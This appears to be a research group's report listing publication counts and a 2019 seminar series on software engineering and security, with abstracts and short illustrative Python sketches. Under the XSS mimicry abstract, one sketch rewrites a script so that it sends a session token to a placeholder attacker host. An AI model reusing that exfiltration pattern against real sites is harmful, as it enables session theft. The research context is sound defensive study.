| New Publications | Number |
| --- | --- |
| Monographs and Edited Volumes | 0 |
| PhD Theses | 1 |
| Journal Articles | 7 |
| Book Chapters | 0 |
| Conference Publications | 12 |
| Technical Reports | 0 |
| White Papers | 0 |
| Magazine Articles | 0 |
| Working Papers | 0 |
| Datasets | 5 |
| Total New Publications | 25 |
| Projects | |
| New Projects | 1 |
| Ongoing Projects | 1 |
| Completed Projects | 1 |
| Members | |
| Faculty Members | 4 |
| Senior Researchers | 4 |
| Associate Researchers | 7 |
| Researchers | 10 |
| Total Members | 25 |
| New Members | 4 |
| PhDs | |
| Ongoing PhDs | 6 |
| Completed PhDs | 1 |
| Seminars | |
| New Seminars | 11 |
Date: 05 April 2019
Presenter: Vasiliki Efstathiou
Abstract
The emergence of online open source repositories in recent years has led to an explosion in the volume of openly available source code, coupled with metadata that relate to a variety of software development activities. As a result, in line with recent advances in machine learning research, software maintenance activities are switching from symbolic formal methods to data-driven methods. In this context, the rich semantics hidden in source code identifiers provide opportunities for building semantic representations of code which can assist tasks of code search and reuse. To this end, we deliver, in the form of pretrained vector space models, distributed code representations for six popular programming languages, namely Java, Python, PHP, C, C++, and C#. The models are produced using fastText, a state-of-the-art library for learning word representations. Each model is trained on data from a single programming language; the code mined for producing all models amounts to over 13,000 repositories. We highlight dissimilarities between natural language and source code, as well as variations in coding conventions between the different programming languages we processed. We describe how these heterogeneities guided the data preprocessing decisions we took and the selection of the training parameters in the released models. Finally, we propose potential applications of the models and discuss their limitations.
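A minimal usage sketch follows, assuming the released models load through the standard fastText Python bindings; the file name `java_model.bin` and the query identifiers are hypothetical, not the names of the actual released artifacts.

```python
# Hypothetical usage sketch: querying a pretrained identifier model with
# the fastText Python bindings. "java_model.bin" is an assumed file name.
import fasttext

model = fasttext.load_model("java_model.bin")

# Identifiers close to "parseJson" in the vector space should surface
# related code vocabulary (serialization, deserialization, and so on).
for score, identifier in model.get_nearest_neighbors("parseJson", k=5):
    print(f"{score:.3f}  {identifier}")

# fastText's subword (character n-gram) representations also yield
# vectors for identifiers never seen during training.
vector = model.get_word_vector("deserializePayload")
print(vector.shape)
```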
Date: 05 April 2019
Presenter: Zoe Kotti
Abstract
Introduction: The establishment of the Mining Software Repositories (MSR) Data Showcase conference track has encouraged researchers to provide more data sets as a basis for further empirical studies. Objectives: Examine the usage of the data papers published in the MSR proceedings in terms of use frequency, users, and use purpose. Methods: Data track papers were collected from the MSR Data Showcase and through the manual inspection of older MSR proceedings. The use of data papers was established through citation searching followed by reading the studies that have cited them. Data papers were then clustered based on their content, whereas their citations were classified according to the knowledge areas of the Guide to the Software Engineering Body of Knowledge. Results: We found that 65% of the data papers have been used in other studies, with a long-tail distribution in the number of citations. MSR data papers are cited less than other MSR papers. A considerable number of the citations stem from the teams that authored the data papers. Publications providing repository data and metadata are the most frequent data papers and the most often cited ones. Mobile application data papers are the least common ones, but the second most frequently cited. Conclusion: Data papers have provided the foundation for a significant number of studies, but there is room for improvement in their utilization. This can be done by setting a higher bar for their publication, by encouraging their use, and by providing incentives for the enrichment of existing data collections.
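The abstract does not specify how the clustering was performed, so the sketch below is only one plausible instantiation of that step: grouping invented paper abstracts by their text with TF-IDF and k-means.

```python
# Illustrative only: cluster data-paper abstracts by textual similarity.
# The abstracts and the choice of k=2 are invented for this sketch.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import KMeans

abstracts = [
    "a dataset of git repository metadata and commit histories",
    "metadata for software repositories mined from github",
    "a collection of mobile application reviews and ratings",
    "android app store data with user ratings",
]

X = TfidfVectorizer(stop_words="english").fit_transform(abstracts)
labels = KMeans(n_clusters=2, n_init=10, random_state=0).fit_predict(X)
print(labels)  # expected: repository-data papers vs. mobile-app papers
```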
Date: 19 April 2019
Presenter: Vaggelis Atlidakis
Abstract
Adversarial examples that fool machine learning models, particularly deep neural networks, have been a topic of intense research interest, with attacks and defenses being developed in a tight back-and-forth. Most past defenses are best-effort and have been shown to be vulnerable to sophisticated attacks. Recently, a set of certified defenses have been introduced, which provide guarantees of robustness to norm-bounded attacks, but they either do not scale to large datasets or are limited in the types of models they can support. This paper presents the first certified defense that both scales to large networks and datasets (such as Google's Inception network for ImageNet) and applies broadly to arbitrary model types. Our defense, called PixelDP, is based on a novel connection between robustness against adversarial examples and differential privacy, a cryptographically inspired formalism that provides a rigorous, generic, and flexible foundation for defense.
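A minimal sketch of the idea, under stated assumptions: calibrated noise is added inside the prediction pipeline and predictions are averaged over repeated noise draws. The sensitivity, sigma, and placement of the noise are illustrative choices, not the paper's exact construction.

```python
# Sketch of noise-based certified prediction in the spirit of PixelDP.
# "model" is any callable returning class scores; all constants are
# illustrative assumptions.
import numpy as np

def noise_layer(x: np.ndarray, sensitivity: float, sigma: float) -> np.ndarray:
    """Add Gaussian noise scaled to the pre-noise computation's sensitivity."""
    return x + np.random.normal(0.0, sensitivity * sigma, size=x.shape)

def predict_smoothed(model, x: np.ndarray, n_draws: int = 100,
                     sigma: float = 0.5) -> np.ndarray:
    """Average class scores over noise draws; the expected output is what
    carries the differential-privacy-style robustness bound."""
    scores = [model(noise_layer(x, sensitivity=1.0, sigma=sigma))
              for _ in range(n_draws)]
    return np.mean(scores, axis=0)
```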
Date: 15 May 2019
Presenter: Vaggelis Giannikas
Abstract
Air transportation systems are exposed to daily disruptions, which have a significant impact on operations, causing not only monetary loss but also customer dissatisfaction. Airlines operate tight schedules to maximise resource utilisation. However, the lack of sufficient buffers often results in a domino effect, where the delay of a single flight can delay many other dependent flights. Due to the complexity of air transportation systems, the task of identifying the cause of a delay is not trivial. In this paper, we propose a framework for the automatic detection of the root causes of delays and their propagation effects using airline historical data. The framework is composed of the following: 1) a delay propagation model to create a connection network, 2) a delay network algorithm to find delay networks, and 3) a community detection algorithm to identify the root causes and impact of disruptions. We test our framework on the historical data of an airline and show that the airline under study is prone to delay propagation through passenger connections. Additionally, the majority of their delays are related to airport capacity, resource allocation, and passengers, and mainly originate from the hub.
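A toy sketch of the framework's third step, under assumed inputs: flights as nodes, propagated delays as edges, and graph communities grouping flights that plausibly share a root cause. The edge list and the root-cause heuristic are invented for illustration.

```python
# Toy delay network: each edge (u, v) means flight u's delay propagated
# to flight v. Communities approximate clusters of related disruptions.
import networkx as nx
from networkx.algorithms.community import greedy_modularity_communities

delays = [("F100", "F205"), ("F100", "F311"), ("F205", "F412"),
          ("F900", "F951"), ("F951", "F960")]
G = nx.DiGraph(delays)

# Community detection runs on the undirected view of the delay network.
for i, community in enumerate(greedy_modularity_communities(G.to_undirected())):
    # Flights with no delayed predecessor are candidate root causes.
    roots = [n for n in community if G.in_degree(n) == 0]
    print(f"community {i}: {sorted(community)}  candidate roots: {roots}")
```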
Dr Vaggelis Giannikas is an Associate Professor at the School of Management, University of Bath, where he also directs the engineering management teaching portfolio. He studies the development and evaluation of intelligent logistics systems, with applications in manufacturing, warehousing, inventory management, and airline networks. A significant part of Vaggelis's research has been conducted in collaboration with corporations in Europe, the USA, and China. Prior to joining the University of Bath, Vaggelis served as a research associate at the Institute for Manufacturing, University of Cambridge, where he was also the associate director of the Cambridge Auto-ID Lab. He holds a PhD in Operations Management and Technology from the University of Cambridge and a BSc in Management Science and Technology from the Athens University of Economics and Business.
Date: 20 May 2019
Presenter: Vaggelis Atlidakis
Abstract
We introduce RESTler, the first stateful REST API fuzzer. RESTler analyzes the API specification of a cloud service and generates sequences of requests that automatically test the service through its API. RESTler generates test sequences by (1) inferring producer-consumer dependencies among request types declared in the specification (e.g., inferring that “a request B should be executed after request A” because B takes as an input a resource-id x produced by A) and by (2) analyzing dynamic feedback from responses observed during prior test executions in order to generate new tests (e.g., learning that “a request C after a request sequence A;B is refused by the service” and therefore avoiding this combination in the future).
We present experimental results showing that these two techniques are necessary to thoroughly exercise a service under test while pruning the large search space of possible request sequences. We used RESTler to test GitLab, a large open-source self-hosted Git service, as well as several Microsoft Azure and Office365 cloud services. RESTler found 28 bugs in GitLab and several bugs in each of the Azure and Office365 cloud services tested so far. These bugs have been confirmed and fixed by the service owners.
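The producer-consumer inference of step (1) can be pictured with the simplified sketch below; the mini-specification and its field names are invented, and RESTler itself infers these dependencies from full OpenAPI (Swagger) specifications rather than this toy format.

```python
# Toy producer-consumer inference: order requests so that every resource
# a request consumes is produced by an earlier request in the sequence.
spec = {
    "POST /users":        {"produces": ["user_id"], "consumes": []},
    "POST /users/repos":  {"produces": ["repo_id"], "consumes": ["user_id"]},
    "GET /repos/commits": {"produces": [],          "consumes": ["repo_id"]},
}

def infer_order(spec):
    """Topologically sort requests by their producer-consumer dependencies."""
    producer = {res: req for req, io in spec.items() for res in io["produces"]}
    deps = {req: {producer[r] for r in io["consumes"]} for req, io in spec.items()}
    ordered = []
    while deps:
        ready = [req for req, d in deps.items() if d <= set(ordered)]
        ordered.extend(ready)
        for req in ready:
            del deps[req]
    return ordered

print(infer_order(spec))
# ['POST /users', 'POST /users/repos', 'GET /repos/commits']
```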
Date: 20 June 2019
Presenter: Charalambos Mitropoulos
Abstract
The evolution of software bugs has been a well-studied topic in software engineering. We used three different program analysis tools to examine the different versions of two popular sets of programming tools (the GNU Binary and Core utilities) and check whether their bugs increase or decrease over time. Each tool is based on a different approach, namely: static analysis, symbolic execution, and fuzzing. In this way we can observe potential differences in the kinds of bugs that each tool detects and examine their effectiveness. To do so, we have performed a qualitative analysis of the results. Overall, our results indicate that we cannot say whether bugs decrease or increase over time, and that the tools identify different bug types based on the method they follow.
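As a toy illustration of the trend question the study asks, the sketch below fits a least-squares slope to per-version bug counts; the counts are invented, and a slope near zero mirrors the "no clear trend" finding.

```python
# Invented per-release bug counts for one tool; a near-zero fitted slope
# means bugs neither clearly increase nor decrease over time.
import numpy as np

versions = np.arange(8)                        # successive releases
bug_counts = np.array([12, 9, 14, 11, 13, 10, 12, 11])

slope, intercept = np.polyfit(versions, bug_counts, deg=1)
print(f"trend: {slope:+.2f} bugs per release")
```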
Date: 25 June 2019
Presenter: Marios Fokaefs
Abstract
Digitization has undoubtedly transformed most markets, turning traditional products and tangible commodities into services. At the centre of this transformation lies software, the enabler and connector behind the adoption of new technologies and the disruption of traditional processes. However, we cannot claim that we understand how software generates value or how we can quantify this value. The first goal of this research is to study the use of software both as a product and as a tool, to identify its impact on generating value and revenue, and eventually to formalize this impact in models and processes that will guide the development and evolution of software systems according to these goals.

Evolution is another challenge of the digital era for software and services alike. Thanks to technological advancements like the Internet and smart devices, an increasing portion of the population as well as a great number of enterprises have become interconnected, with immediate access to vast amounts of information. Besides the great number of connections and the high speed of data production and consumption, this situation is also characterized by its greatly dynamic nature and high volatility. Under these circumstances, software needs to be adjustable in order to constantly generate value for the company and its clients. From a technical perspective, recent advancements in software engineering, like DevOps and self-adaptive systems, have contributed towards adapting software to such dynamic conditions. However, profitability and continuous value generation are not always immediately considered in this setting, either as goals or as constraints. The economic impact of a software change, or the need to also adapt business and economic strategies, is assessed after the change and possibly long after it is relevant. For example, consider the extension of a mobile banking app to enable remote bill payments. Is there a way to predict the economic benefits of this feature before it is developed? How accurate will this prediction be? How fast can we roll out the new version, including the business planning? Therefore, the second goal of this research is to align the technical and economic goals of software change.
Marios Fokaefs is an Assistant Professor in the Department of Computer and Software Engineering at Polytechnique Montréal. Previously, from February 2015, he was a Postdoctoral Fellow with the Centre of Excellence for Research in Adaptive Systems at York University, Canada, working with Professor Marin Litoiu. He received his Master's and PhD in Software Engineering in January 2015 from the Department of Computing Science at the University of Alberta, Canada, under the supervision of Professor Eleni Stroulia. He also holds a BSc (2008) from the Department of Applied Informatics at the University of Macedonia, Thessaloniki, Greece, where he studied under the supervision of Professor Alexander Chatzigeorgiou.
Date: 05 July 2019
Presenter: Stefanos Georgiou
Abstract
Continuous integration and deployment (CI/CD) are part of the daily process in an industrial environment, used to boost productivity, reduce bugs, and automate processes. However, if not utilized correctly, they can cost a significant amount of time in testing and integrating code changes. In this presentation, we show the effort demanded before and after employing CI/CD practices. Additionally, we show the shortcomings of our first CI/CD pipeline and explain how we optimized it. Moreover, we demonstrate how we improved our development process by incorporating cutting-edge technologies and practices such as Bitrise, Cypress, Docker containers, and Google's Cloud Platform services.
Date: 24 July 2019
Presenter: Maria Kechagia (joint work with Xavier Devroey, Annibale Panichella, Georgios Gousios, Arie van Deursen)
Abstract
Application Programming Interfaces (APIs) typically come with (implicit) usage constraints. Violations of these constraints (API misuses) can lead to software crashes. Even though there are several tools that can detect API misuses, most of them suffer from a very high rate of false positives. We introduce Catcher, a novel API-misuse detection approach that combines static exception propagation analysis with automatic search-based test case generation to effectively and efficiently pinpoint crash-prone API misuses in client applications. We validate Catcher against 21 Java applications, targeting misuses of the Java platform's API. Our results indicate that Catcher is able to generate test cases that uncover 243 (unique) API misuses that result in crashes. Our empirical evaluation shows that Catcher can detect a large number of misuses (77 cases) that would remain undetected by the traditional coverage-based test case generator EvoSuite. Additionally, Catcher is on average eight times faster than EvoSuite in generating test cases for the identified misuses. Finally, we find that the majority of the exceptions triggered by Catcher are unexpected to developers, i.e., not only unhandled in the source code but also not listed in the documentation of the client applications.
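The exception-propagation half of the approach can be pictured with the toy sketch below; Catcher performs this analysis on Java code, so the Python call graph and exception sets here are purely illustrative assumptions.

```python
# Toy static exception propagation: which exceptions can escape a public
# API entry point, assuming no handlers anywhere on the call path?
raises = {"parse_int": {"ValueError"}, "read_file": {"OSError"}}
calls = {"load_config": ["read_file", "parse_int"],
         "api_entry": ["load_config"]}

def escaping(fn, raises, calls):
    """Union of exceptions raised by fn and, transitively, by its callees."""
    out = set(raises.get(fn, set()))
    for callee in calls.get(fn, []):
        out |= escaping(callee, raises, calls)
    return out

# A crash-prone entry point: both exceptions reach the API boundary unhandled.
print(escaping("api_entry", raises, calls))  # {'ValueError', 'OSError'}
```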
Dr. Maria Kechagia is a research fellow at CREST, UCL. Previously, she was a postdoctoral fellow at the Delft University of Technology and a member of the Software Engineering Research Group. She finished her Ph.D. in Software Engineering in the Department of Management Science and Technology at the Athens University of Economics and Business, under the supervision of Prof. Diomidis Spinellis. Before that, she pursued her MSc in Computing (Software Engineering) at Imperial College London and her BSc in Management Science and Technology at the Athens University of Economics and Business. Her research interests lie in the areas of software engineering, software verification, crash data analytics, and programming languages. In particular, her current research focuses on combining static analysis and software testing to effectively and efficiently repair API-related bugs in software programs. Her research work has been published in leading peer-reviewed software engineering conferences and journals, including ICSE, ISSTA, MSR, EMSE, and JSS.
Date: 13 September 2019
Presenter: Stefanos Chaliasos
Abstract
Despite numerous efforts to mitigate Cross-Site Scripting (XSS) attacks, XSS remains one of the most prevalent threats to modern web applications. Recently, a number of novel XSS patterns, based on code reuse and obfuscated payloads, were introduced to bypass different protection mechanisms such as sanitization frameworks, web application firewalls, and the Content Security Policy (CSP). Nevertheless, a class of script-whitelisting defenses that perform their checks inside the JavaScript engine of the browser remains effective against these new patterns. We have evaluated the effectiveness of whitelisting mechanisms for the web by introducing "JavaScript mimicry attacks". The concept behind such attacks is to use slight transformations (i.e., changing the leaf values of the abstract syntax tree) of an application's benign scripts as attack vectors, for malicious purposes. Our proof-of-concept exploitations indicate that JavaScript mimicry can bypass script-whitelisting mechanisms, affecting either users (e.g., cookie stealing) or applications (e.g., cryptocurrency miner hijacking). Furthermore, we have examined the applicability of such attacks at scale by performing two studies: one based on popular application frameworks (e.g., WordPress) and the other focusing on scripts coming from Alexa's top 20 websites. Finally, we have developed an automated method to help researchers and practitioners discover mimicry scripts in the wild. To do so, our method employs symbolic analysis based on a lightweight weakest-precondition calculation.
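To picture a leaf-value transformation, the sketch below uses Python's own ast module as an analogy for the JavaScript case: the script's AST shape is preserved while a string leaf is rewritten, which is why shape-based whitelists can be fooled. The benign script and the attacker URL are invented.

```python
# Analogy in Python (the actual attacks target JavaScript): rewrite string
# leaves of a benign script's AST while keeping its structure intact.
import ast  # ast.unparse requires Python 3.9+

benign = 'send_metrics("https://example.com/stats", session_token)'

class LeafRewriter(ast.NodeTransformer):
    def visit_Constant(self, node):
        if isinstance(node.value, str):
            # Swap the string leaf for an attacker-chosen value.
            return ast.copy_location(
                ast.Constant(value="https://attacker.example/steal"), node)
        return node

tree = LeafRewriter().visit(ast.parse(benign))
ast.fix_missing_locations(tree)
print(ast.unparse(tree))
# send_metrics('https://attacker.example/steal', session_token)
```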
Date: 19 September 2019
Presenter: Christos Tsigkanos
Abstract
Computing and communication capabilities are increasingly being embedded into physical spaces, blurring the boundary between the computational and physical worlds; typically, this is the case in modern cyber-physical or Internet-of-Things (IoT) systems. Conceptually, such composite environments can be abstracted into a topological model where computational and physical entities are connected in a graph structure, yielding a cyber-physical space. Like any other software-intensive system, such a space is highly dynamic and typically undergoes continuous change: it is evolving. This brings manifold challenges, as dynamics may affect, e.g., safety, security, or reliability requirements. Modelling space and its dynamics, as well as supporting formal reasoning about various properties of an evolving space, are crucial prerequisites for engineering dependable space-intensive systems, e.g. to assure requirements satisfaction or to trigger correct adaptation.
This talk will show an avenue for research which can be characterized as rethinking spatial environments from a software engineering perspective, in both design and operation aspects. Regarding design, we will see how domain descriptions can give rise to models amenable to automated analyses of dynamic behaviours in spaces populated with humans, robots, or mobile devices. Analysis amounts to assessing whether some highly space-dependent collective behaviour violates certain requirements that the overall system should exhibit. Regarding runtime, we will consider supporting analyses on the cloud on behalf of resource-constrained and spatially distributed IoT devices. We will discuss how spatial verification processes can be integrated in the service layer of an IoT-cloud architecture based on microservices, and what tradeoffs emerge across different deployment options.
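A minimal sketch of the topological abstraction follows: rooms, devices, and agents as graph nodes, connectivity and containment as edges, and a safety requirement re-checked as the space evolves. The concrete space and the requirement are invented for illustration.

```python
# Toy cyber-physical space as a graph; nodes mix physical locations,
# devices, and agents, and edges capture connectivity or containment.
import networkx as nx

space = nx.Graph([
    ("lobby", "corridor"), ("corridor", "server_room"),
    ("corridor", "office"),
    ("visitor", "lobby"),      # agent currently located in the lobby
    ("camera", "corridor"),    # device attached to the corridor
])

def violates_safety(space: nx.Graph) -> bool:
    """Requirement: a visitor must never be able to reach the server room."""
    return nx.has_path(space, "visitor", "server_room")

print(violates_safety(space))   # True: lobby -> corridor -> server_room

# As the space evolves (e.g., a door closes), re-check the requirement.
space.remove_edge("corridor", "server_room")
print(violates_safety(space))   # False
```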
Christos Tsigkanos is a university assistant at the Technical University of Vienna. Previously, he was a post-doctoral researcher at Politecnico di Milano, Italy, where he received his PhD in 2017, defending a thesis entitled "Modelling and Verification of Evolving Cyber-Physical Spaces" (advisor: Prof. Carlo Ghezzi). His research interests lie at the intersection of dependable systems and formal aspects of software engineering, and include security and privacy in distributed, self-adaptive, and cyber-physical systems, requirements engineering, and formal verification.